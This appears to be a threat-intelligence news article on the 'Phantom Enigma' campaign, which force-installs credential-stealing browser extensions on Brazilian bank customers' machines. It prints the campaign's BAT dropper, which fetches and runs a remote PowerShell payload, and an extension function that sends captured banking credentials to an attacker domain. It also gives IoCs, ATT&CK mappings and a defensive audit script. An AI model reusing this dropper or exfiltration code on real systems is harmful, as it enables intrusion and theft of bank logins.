Saturday, February 14, 2026

Malware Campaign Installs Malicious Browser Extensions on Chrome & Edge to Exfiltrate Sensitive Data

A sophisticated malware campaign, tracked as “Phantom Enigma,” has been discovered exploiting browser extension mechanisms in Google Chrome, Microsoft Edge, and Brave.

The objective is clear: stealthily exfiltrate sensitive authentication data, particularly targeting bank customers in Brazil.

Threat intelligence teams from Positive Technologies Security Expert Center exposed this campaign’s full attack chain, revealing both technical depth and adaptation.

Initial Access and Delivery Mechanisms

The campaign begins with targeted phishing emails masquerading as invoices, enticing recipients to download malicious files. These emails contain either direct download links or weaponized attachments with the following key variants:

  • BAT scripts: Batch files orchestrating the initial infection.
  • MSI (Windows Installer) and Inno Setup Installers: Installers signed to appear legitimate but configured for malicious post-install actions.

For example, a typical BAT script escalates privileges and downloads a PowerShell payload:

```batch
@echo off
REM Check for admin rights; "net session" fails unless the shell is elevated.
net session >nul 2>&1
if %errorLevel% neq 0 (
    REM Not elevated: relaunch this script through a UAC prompt.
    powershell -Command "Start-Process '%~f0' -Verb RunAs"
    exit
)
REM Elevated: fetch the second-stage PowerShell payload and run it.
powershell -NoProfile -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://enota.clientepj.com/cliente.ps1' -OutFile '%TEMP%\cliente.ps1'"
powershell -NoProfile -ExecutionPolicy Bypass -File "%TEMP%\cliente.ps1"
```

The downloaded PowerShell script includes virtual machine evasion routines, persistence mechanisms via Windows Registry, and disables User Account Control (UAC). Critically, it connects to a command-and-control server (142.54.185.178) to await further instructions.

Browser Extension Installation

The malicious extension is force-installed by manipulating Windows Registry or browser policy files (e.g., HKLM\Software\Policies\Google\Chrome\ExtensionInstallForcelist). Attackers either use official Chrome Web Store IDs or install the extension directly from disk:

  • Persistence: The malware modifies .lnk shortcuts for Chrome/Edge, adding the --load-extension=<path> parameter to ensure the malicious code loads whenever the browser starts.
  • Alternative Payloads: If the extension path is not viable, attackers can deploy a Mesh Agent-based RAT (Remote Access Tool) for broader system compromise.

Malicious Extension Functionality

The extension comprises several obfuscated JavaScript files, primarily run-back.js and cs.js. Once active, the extension monitors banking web portals (specifically Banco do Brasil), intercepting login tokens, account passwords, and authentication headers.

A key function sends stolen credentials to the attacker’s server:

```javascript
function r(requestBody, requestMethod) {
  // Read the per-victim identifier the extension stored at install time.
  chrome.storage.sync.get("eindeutigeKennung", function (keyData) {
    let uniqueID = keyData.eindeutigeKennung;
    // Attacker endpoint keyed by victim ID and the intercepted bank user ID.
    let url = "https://financial-executive.com/comando_temporario.php?eindeutigeKennung=" + uniqueID + "&k=" + requestBody.identificacaoUsuario;
    // Forward the captured request body (credentials, tokens) to the C2.
    fetch(url, {
      method: requestMethod,
      headers: {'Content-Type': "application/json"},
      body: JSON.stringify(requestBody)
    });
  });
}
```

The extension listens for specific banking page activity. If a user attempts login or inputs a password, these details are captured and exfiltrated in real-time.

The extension also periodically polls the attacker’s server for new instructions, enabling dynamic attack capabilities such as displaying fake QR codes or phishing prompts on the banking site.

System and Network Impact

  • Target Scope: Over 70 organizations compromised, with more than 700 confirmed malicious extension downloads (some by security sandboxes).
  • Geographic Focus: Specifically engineered to detect and require “Warsaw Technology,” a security solution used by Brazilian banks.
  • Infrastructure: Utilizes multiple attacker-controlled domains (e.g., clientepj.com, financial-executive.com, computadorpj.com) and IPs for payload delivery and command-and-control.

Technical Indicators and Defensive Insights

Indicators of Compromise (IOCs)

Network:

  • Attacker domains: financial-executive.com, clientepj.com, computadorpj.com
  • C2 IPs: 142.54.185.178, 107.174.231.26

Extension IDs:

  • nplfchpahihleeejpjmodggckakhglee
  • ckkjdiimhlanonhceggkfjlmjnenpmfm

File Hashes: (Sample SHA-256)

  • bae3cce0cbe6a0227ed33fe566f0e8fe4780f2a57743acc98f6859740d2d254d
  • a3d85fad74a24a9fc45b91c82f178a6bf5eb041804ecfb4f2c529622772e8b8f

Persistence and Evasion

  • Registry edits for autostart.
  • Modifies browser shortcuts for extension persistence.
  • Checks for virtual machines and disables itself when one is detected.
  • Disables UAC to impede user prompts and AV products.

MITRE ATT&CK Techniques:

  • T1547 (Persistence via Registry Run Keys)
  • T1176 (Browser Extensions)
  • T1059.001 (PowerShell)
  • T1204.002 (Malicious File Execution)

The Phantom Enigma campaign showcases advanced multi-vector attack strategies, leveraging browser extension mechanisms for stealthy credential theft. Its technical sophistication—ranging from VM evasion, registry and shortcut manipulation, to real-time command-and-control—demands vigilant endpoint monitoring and proactive browser security policies, particularly for organizations and users in targeted regions like Brazil.

Defensive Recommendations:

  • Regularly audit extension policies and browser shortcut parameters.
  • Block listed domains and extension IDs at the network and endpoint level.
  • Educate users about phishing threats and initiate rapid incident response on detection of related IOCs.
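The force-install and shortcut mechanisms described above are the two things the first recommendation asks defenders to audit. The following Python is an added example, not code from the report or from Positive Technologies: it takes ExtensionInstallForcelist values as exported from the registry (Chrome's documented `<id>;<update_url>` form) and a name-to-arguments map of browser shortcuts, and flags the two extension IDs from the IoC list, any non-Web-Store update URL, and any `--load-extension` side-load. The benign extension ID, the `update.example.invalid` host and the sample shortcuts are constructed.

```python
import re
from typing import Dict, List
# Extension IDs listed in the report's IoC section.
KNOWN_BAD_IDS = {
    "nplfchpahihleeejpjmodggckakhglee",
    "ckkjdiimhlanonhceggkfjlmjnenpmfm",
}
# Chrome Web Store update URL; any other update URL in a force-list entry merits review.
WEBSTORE_UPDATE_URL = "https://clients2.google.com/service/update2/crx"
EXT_ID_RE = re.compile(r"^[a-p]{32}$")  # Chrome extension IDs: 32 chars from a-p
LOAD_EXT_RE = re.compile(r'--load-extension=("[^"]+"|\S+)')

def check_forcelist(entries: List[str]) -> List[str]:
    """Inspect ExtensionInstallForcelist values of the form "<id>;<update_url>" or "<id>"."""
    findings = []
    for raw in entries:
        ext_id, _, update_url = raw.partition(";")
        if not EXT_ID_RE.match(ext_id):
            findings.append(f"malformed forcelist entry: {raw!r}")
            continue
        if ext_id in KNOWN_BAD_IDS:
            findings.append(f"known Phantom Enigma extension forced: {ext_id}")
        if update_url and update_url != WEBSTORE_UPDATE_URL:
            findings.append(f"non-Web-Store update URL for {ext_id}: {update_url}")
    return findings

def check_shortcut_args(shortcuts: Dict[str, str]) -> List[str]:
    """Flag browser shortcuts whose arguments side-load an unpacked extension from disk."""
    findings = []
    for name, args in shortcuts.items():
        match = LOAD_EXT_RE.search(args)
        if match:
            findings.append(f"{name} side-loads {match.group(1)}")
    return findings

# Constructed sample input standing in for a registry export and a .lnk inventory.
SAMPLE_FORCELIST = [
    "abcdefghijklmnopabcdefghijklmnop;https://clients2.google.com/service/update2/crx",  # benign
    "nplfchpahihleeejpjmodggckakhglee;https://clients2.google.com/service/update2/crx",
    "ckkjdiimhlanonhceggkfjlmjnenpmfm;http://update.example.invalid/crx",
]
SAMPLE_SHORTCUTS = {
    "Google Chrome.lnk": '--load-extension="C:\\Users\\Public\\ext" --no-first-run',
    "Microsoft Edge.lnk": "--profile-directory=Default",
}

if __name__ == "__main__":
    for finding in check_forcelist(SAMPLE_FORCELIST) + check_shortcut_args(SAMPLE_SHORTCUTS):
        print("[!]", finding)
```

On a real host the force-list values come from HKLM\Software\Policies\Google\Chrome\ExtensionInstallForcelist (and the Edge equivalent), and the shortcut arguments from the .lnk files the malware is reported to modify.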

Cybersecurity defenders should remain on high alert for evolving browser-based malware campaigns as attacker sophistication only intensifies.
